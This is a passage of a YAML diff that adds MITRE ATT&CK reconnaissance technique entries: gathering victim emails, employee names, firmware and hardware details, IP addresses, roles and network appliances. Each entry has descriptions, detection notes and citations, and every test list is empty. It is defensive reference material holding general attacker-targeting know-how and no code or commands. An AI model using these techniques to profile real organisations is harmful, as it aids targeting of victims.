+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).
+ id: attack-pattern--e3b168bd-fcd7-439e-9382-2e6c2f63514d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-25T22:58:22.915Z'
+ created: '2020-10-02T15:46:24.670Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1589.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1589.002
+ url: https://attack.mitre.org/techniques/T1589/002
+ - source_name: HackersArise Email
+ url: https://www.hackers-arise.com/email-scraping-and-maltego
+ description: Hackers Arise. (n.d.). Email Scraping and Maltego. Retrieved
+ October 20, 2020.
+ - source_name: CNET Leaks
+ url: https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/
+ description: Ng, A. (2019, January 17). Massive breach leaks 773 million email
+ addresses, 21 million passwords. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Email Addresses
+ description: |-
+ Before compromising a victim, adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.
+
+ Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).
+ id: attack-pattern--69f897fd-12a9-4c89-ad6a-46d2f3c38262
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T03:46:04.662Z'
+ created: '2020-10-02T14:56:24.866Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1589.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1589.003
+ url: https://attack.mitre.org/techniques/T1589/003
+ - source_name: OPM Leak
+ url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+ Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Employee Names
+ description: |-
+ Before compromising a victim, adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
+
+ Adversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
+ id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T03:46:29.173Z'
+ created: '2020-10-02T14:57:15.906Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1592.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1592.003
+ url: https://attack.mitre.org/techniques/T1592/003
+ - source_name: ArsTechnica Intel
+ url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
+ description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
+ source code and proprietary data dumped online. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Firmware
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
+
+ Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).
+ id: attack-pattern--b85f6ce5-81e8-4f36-aff2-3df9d02a9c9d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T03:52:36.854Z'
+ created: '2020-10-02T16:46:42.537Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1592:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1592
+ url: https://attack.mitre.org/techniques/T1592
+ - source_name: ATT ScanBox
+ url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+ description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
+ Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Gather Victim Host Information
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+ id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T03:53:39.351Z'
+ created: '2020-10-02T16:39:33.966Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1589:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1589
+ url: https://attack.mitre.org/techniques/T1589
+ - source_name: OPM Leak
+ url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+ Retrieved October 20, 2020.
+ - source_name: Register Deloitte
+ url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
+ description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
+ Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
+ October 19, 2020.'
+ - source_name: Register Uber
+ url: https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/
+ description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
+ into court to find who hacked database of 50,000 drivers. Retrieved October
+ 19, 2020.
+ - source_name: Detectify Slack Tokens
+ url: https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/
+ description: Detectify. (2016, April 28). Slack bot token leakage exposing
+ business critical information. Retrieved October 19, 2020.
+ - source_name: Forbes GitHub Creds
+ url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+ description: Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud
+ Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
+ October 19, 2020.
+ - source_name: GitHub truffleHog
+ url: https://github.com/dxa4481/truffleHog
+ description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
+ 19, 2020.
+ - source_name: GitHub Gitrob
+ url: https://github.com/michenriksen/gitrob
+ description: 'Michael Henriksen. (2018, June 9). Gitrob: Putting the Open
+ Source in OSINT. Retrieved October 19, 2020.'
+ - source_name: CNET Leaks
+ url: https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/
+ description: Ng, A. (2019, January 17). Massive breach leaks 773 million email
+ addresses, 21 million passwords. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.
+
+ Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
+ name: Gather Victim Identity Information
+ id: attack-pattern--5282dd9a-d26d-4e16-88b7-7c0f4553daf4
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-27T02:27:31.387Z'
+ created: '2020-10-02T14:54:59.263Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1590:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1590
+ url: https://attack.mitre.org/techniques/T1590
+ - source_name: WHOIS
+ url: https://www.whois.net/
+ description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
+ - source_name: DNS Dumpster
+ url: https://dnsdumpster.com/
+ description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
+ - source_name: Circl Passive DNS
+ url: https://www.circl.lu/services/passive-dns/
+ description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
+ Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Gather Victim Network Information
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
+ id: attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-25T22:58:23.086Z'
+ created: '2020-10-02T15:45:17.628Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1591:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1591
+ url: https://attack.mitre.org/techniques/T1591
+ - source_name: ThreatPost Broadvoice Leak
+ url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
+ description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
+ Personal Voicemail Transcripts. Retrieved October 20, 2020.
+ - source_name: DOB Business Lookup
+ url: https://www.dobsearch.com/business-lookup/
+ description: Concert Technologies . (n.d.). Business Lookup - Company Name
+ Search. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Gather Victim Org Information
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
+
+ Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Business Lookup) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
+ id: attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:10:36.479Z'
+ created: '2020-10-02T16:27:02.339Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1592.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1592.001
+ url: https://attack.mitre.org/techniques/T1592/001
+ - source_name: ATT ScanBox
+ url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+ description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
+ Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Hardware
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).
+ id: attack-pattern--24286c33-d4a4-4419-85c2-1d094a896c26
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T03:53:03.353Z'
+ created: '2020-10-02T16:40:47.488Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1590.005:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1590.005
+ url: https://attack.mitre.org/techniques/T1590/005
+ - source_name: WHOIS
+ url: https://www.whois.net/
+ description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
+ - source_name: DNS Dumpster
+ url: https://dnsdumpster.com/
+ description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
+ - source_name: Circl Passive DNS
+ url: https://www.circl.lu/services/passive-dns/
+ description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
+ Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: IP Addresses
+ description: |-
+ Before compromising a victim, adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+ id: attack-pattern--0dda99f0-4701-48ca-9774-8504922e92d3
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:03:29.213Z'
+ created: '2020-10-02T15:59:11.695Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1591.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1591.003
+ url: https://attack.mitre.org/techniques/T1591/003
+ - source_name: ThreatPost Broadvoice Leak
+ url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
+ description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
+ Personal Voicemail Transcripts. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Identify Business Tempo
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
+
+ Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199))
+ id: attack-pattern--2339cf19-8f1e-48f7-8a91-0262ba547b6f
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:10:12.352Z'
+ created: '2020-10-02T16:34:32.435Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1591.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1591.004
+ url: https://attack.mitre.org/techniques/T1591/004
+ - source_name: ThreatPost Broadvoice Leak
+ url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
+ description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
+ Personal Voicemail Transcripts. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Identify Roles
+ description: |-
+ Before compromising a victim, adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
+
+ Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).
+ id: attack-pattern--cc723aff-ec88-40e3-a224-5af9fd983cc4
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:10:36.279Z'
+ created: '2020-10-02T16:37:30.015Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1590.006:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1590.006
+ url: https://attack.mitre.org/techniques/T1590/006
+ - source_name: Nmap Firewalls NIDS
+ url: https://nmap.org/book/firewalls.html
+ description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
+ and Intrusion Detection Systems. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Network Security Appliances
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
+
